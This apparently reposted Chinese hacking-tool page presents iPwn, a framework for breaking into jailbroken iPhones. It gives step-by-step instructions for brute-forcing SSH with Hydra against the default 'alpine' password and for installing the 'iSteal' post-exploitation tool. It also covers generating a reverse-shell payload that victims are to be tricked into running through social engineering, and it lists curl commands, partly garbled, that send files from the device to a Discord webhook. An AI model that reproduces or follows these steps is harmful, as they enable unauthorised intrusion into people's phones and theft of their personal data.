iPwn-iOS设备渗透测试漏洞利用框架|黑客工具

iPwn-iOS设备渗透测试漏洞利用框架|黑客工具

<!> 请记住:您尝试使用此工具的 IPHONE 必须已越狱 <!>

状态 – ❌

这个项目仍在进行中。我正在添加更多扩展和选项,用于收集设备信息和其他内容的后期开发。我还在研究一种将有效负载放入普通 iOS 调整中的方法,以便更容易获得反向 shell。

iPwn-iOS设备渗透测试漏洞利用框架|黑客工具

更新日志

[6/2/21] – 为将设备连接到计算机并想修改它们的人添加了一个额外的菜单。将很快添加更多内容。

[6/2/21] – 为“iSteal”后期开发工具添加了 4 个额外模块。还添加了安装 checkra1n 越狱的选项。

[5/25/21] – 为“iSteal”后期开发工具添加了 8 个额外模块。

[5/25/21] – 为“iSteal”后期开发工具添加了 2 个额外模块。

说明/如何使用 [对于菜鸟]

iPwn 是一个渗透测试框架,旨在利用和访问 iOS 设备。它还具有一个名为“iSteal”的微型框架扩展,用于后期漏洞利用(在您访问设备之后)。本说明将引导您了解访问 iOS 设备并从中获取信息的不同方式和步骤。

访问 iOS 设备的第一种方式- SSH 暴力破解

大多数带有 Cydia 的越狱 iOS 设备都预装了 OpenSSH。通常,凭据非常弱或很常见,如果您从我的 Github 下载 iPwn,最常见的密码之一将包含在您的文件夹中的密码字典列表中。

那么让我们开始吧!所以首先,我们将从运行脚本开始。

python main.py

然后,我们将输入“brute”命令。(如果你想输入帮助并熟悉命令,你可以这样做。)

iPwn-iOS设备渗透测试漏洞利用框架|黑客工具

一旦我们输入“brute”命令。输入“help”以显示所有可用命令。

iPwn-iOS设备渗透测试漏洞利用框架|黑客工具

现在,我们将使用“默认”命令来启动 SSH-Bruteforcing,其中包含最常见的密码的单词表。系统会要求您输入目标 IP 地址,请确保您输入的 IP 地址正确有效,按 Enter,然后继续下一步。

iPwn-iOS设备渗透测试漏洞利用框架|黑客工具

<!> 如果您遇到错误,请确保已安装 Hydra,您可以使用以下命令安装 Hydra <!>

sudo apt install hydra
sudo pacman -S hydra

现在回到教程,如果你的 PC 上安装了 hydra,它应该已经在尝试暴力破解了。只需坐下大约 20-40 秒,如果设备确实使用单词列表中提供的默认/通用凭据,那么 Hydra 应该会给您一条显示正确密码的小消息。

iPwn-iOS设备渗透测试漏洞利用框架|黑客工具

正如我们所见,正确的密码是“alpine”。现在我们可以通过在另一个终端窗口上执行“ssh root@ip_goes_here”来登录手机。一旦它提示您输入密码,只需输入您从 Hydra 获得的密码。

iPwn-iOS设备渗透测试漏洞利用框架|黑客工具

现在我们登录了!

iPwn-iOS设备渗透测试漏洞利用框架|黑客工具

在这一点上,我们可能想在手机上收集一些信息并对其进行控制,稍后会进行。因为首先,我们需要安装一些非常重要的东西。如果您想使用 SCP 传输自动执行所有操作的安装文件,那么您可以这样做。该文件位于 /post-exploitation/post.sh 中。将“post.sh”文件传输到 iOS 设备后,通过“bash post.sh”执行它,它应该开始安装和设置我们将使用的后期利用工具。

<!> 注意:下面的命令仅适用于想要手动安装必要的软件包和工具的人<!>

apt install netcat
apt install python3
apt install nano
git clone https://github.com/0x1CA3/iSteal.git

好的,现在我们已经安装了所有东西,我们可以进入“iSteal”文件夹并运行“iSteal”后渗透脚本。

python3 post.py

<!> 注意:确保在尝试运行 python 文件时,使用“python3”而不是“python”或“py”运行它<!>

所以现在脚本应该被加载,如果你想使用’help’命令并环顾四周,你可以这样做。

iPwn-iOS设备渗透测试漏洞利用框架|黑客工具

现在,我们将使用“list”命令来显示可用于后渗透模块/选项

iPwn-iOS设备渗透测试漏洞利用框架|黑客工具

<!> 请记住:开发后脚本将有大量更新,并且将添加更多模块,因此为了准确起见,将更新此图像<!>

要使用模块,只需执行“use specific/module”即可。示例:use modules/list_installed_default_apps

正如您所看到的,当我们运行该模块时,它会向我们显示目标 iOS 设备上已安装的默认应用程序。

iPwn-iOS设备渗透测试漏洞利用框架|黑客工具

访问 iOS 设备的第二种方法- 反向shell

现在,我将向您展示如何使用第二种方法,这种方法更高级一些。请记住,我不会包括这部分的图片。

通过'python main.py'运行iPwn框架
输入“payload”命令
等待payload工厂装载。
例如:use payloads/factory/reverse_bash
输入您的IP
输入您的端口
然后你会得到一条信息,写着"payload generated{有效载荷生成}"
输入'back'命令返回主菜单
键入'listen'命令开始侦听传入的连接
确保你的受害者通过终端或通过他们自己的方式运行脚本,尝试社会工程,富有创造性!
一旦脚本在受害iOS设备上执行,您应该会获得一个连接
通过传输位于/post-exploitation中的'post.sh'并执行它来安装重要的包,或者自己手动安装。
你现在可以运行' issteal '或'AutoEnum'后渗透工具
玩得开心!:)

<!> 如果您在执行第 2 步时遇到了必须安装重要包/工具的部分,请进入第 1 步并复制安装包/工具的指南!<!>

文件传输/提取

有多种方法可以将文件传输到 iOS 设备,也有很多方法可以下载它们。从 iOS 设备提取和下载文件的最简单方法是使用 Curl 和 discord webhook。

<!> 注意:下面的部分将演示如何使用 curl <!> 从 iOS 设备中提取和下载文件

步骤1:创建discord服务器
步骤2:创建一个webhook并复制链接
步骤3:在iOS设备上,导航到包含你想要检索的文件的目录。
第四步:输入下面的命令(将file_here.txt替换为文件名,将webhook_url_here替换为你的webhook url)

webhook_url_here .txt -F 'payload_json={"wait": true, "content": "", "username": ""}' 
webhook_url_here .txt -F 'payload_json={"wait": true, "content": "" ", "username": "" "}'
webhook_url_here .txt -F 'payload_json={"wait": true, "content": "" ", "username": "" "}

第五步:等待大约10-50秒
完成了!这个文件现在应该被上传到你的discord服务器。您现在可以下载/查看该文件。

经测试的操作系统

Windows 10 - 稳定版
Garuda Linux - 稳定版
Arch based distros - 稳定版

受支持和测试的 iOS 设备

-----------------
iPods newer than the 4th Gen iPod
iPhone 4
iPhone 4S
iPhone 5
iPhone 6
iPhone SE
iPhone 7
iPhone 7+
iPhone 8
iPhone 8+
iPhone X
iPhone XR
iPhone XS
iPhone 11
iPhone 12

My own tested devices [Ones I myself have personally tested]
---------------------
iPhone 4S
iPhone 5S
iPhone SE
iPhone 7+
iPad Air
iPod 4th Gen

工具截图

iPwn-iOS设备渗透测试漏洞利用框架|黑客工具
iPwn-iOS设备渗透测试漏洞利用框架|黑客工具
iPwn-iOS设备渗透测试漏洞利用框架|黑客工具
iPwn-iOS设备渗透测试漏洞利用框架|黑客工具

下载地址

①GitHub: https://github.com/0x1CA3/iPwn.zip
②雨苁网盘: iPwn.rar
解压密码: www.ddosi.org

Leave a Reply

您的电子邮箱地址不会被公开。 必填项已用*标注